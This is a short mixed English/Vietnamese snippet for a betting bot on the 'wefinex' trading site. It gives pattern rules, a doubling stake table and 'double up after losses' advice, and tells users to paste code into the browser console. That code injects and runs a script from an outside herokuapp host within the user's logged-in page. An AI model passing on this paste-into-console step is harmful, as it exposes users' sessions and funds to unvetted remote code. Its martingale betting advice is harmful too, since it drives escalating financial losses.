FLow rule

var listRule = [
    "xdxdxdxx->x",
    "xdxdddxx->x",
    "xdxdxddx->x",
    "xdxddddx->x",
    "xdddxdxx->x",
    "xdddddxx->x",
    "xdddxddx->x",
    "xddddddx->x",
    "ddxdxdxx->x",
    "ddxdddxx->x",
    "ddxdxddx->x",
    "ddxddddx->x",
    "ddddxdxx->x",
    "ddddddxx->x",
    "ddddxddx->x",
    "dddddddx->x",
    "xxxxdxdd->d",
    "xxxxxxdd->d",
    "xxxxdxxd->d",
    "xxxxxxxd->d",
    "xxdxdxdd->d",
    "xxdxxxdd->d",
    "xxdxdxxd->d",
    "xxdxxxxd->d",
    "dxxxdxdd->d",
    "dxxxxxdd->d",
    "dxxxdxxd->d",
    "dxxxxxxd->d",
    "dxdxdxdd->d",
    "dxdxxxdd->d",
    "dxdxdxxd->d",
    "dxdxxxxd->d"
];
var lostValueSet = {
    0: 1,
    1: 2,
    2: 4,
    3: 8,
    4: 16,
    5: 32,
    6: 64
};


Open web
Goto wefinex
F12/Right Click ->Inspect
Pase here to console


3s cuoi danh
//check lost more > 3

Remember last choose and "gap thep" if lost money


3 cau sai

var fileref=document.createElement('script')
fileref.setAttribute("type","text/javascript")
fileref.setAttribute("src", "https://tranquil-fjord-14350.herokuapp.com/release/v8-2/release.js")
document.getElementsByTagName("head")[0].appendChild(fileref)
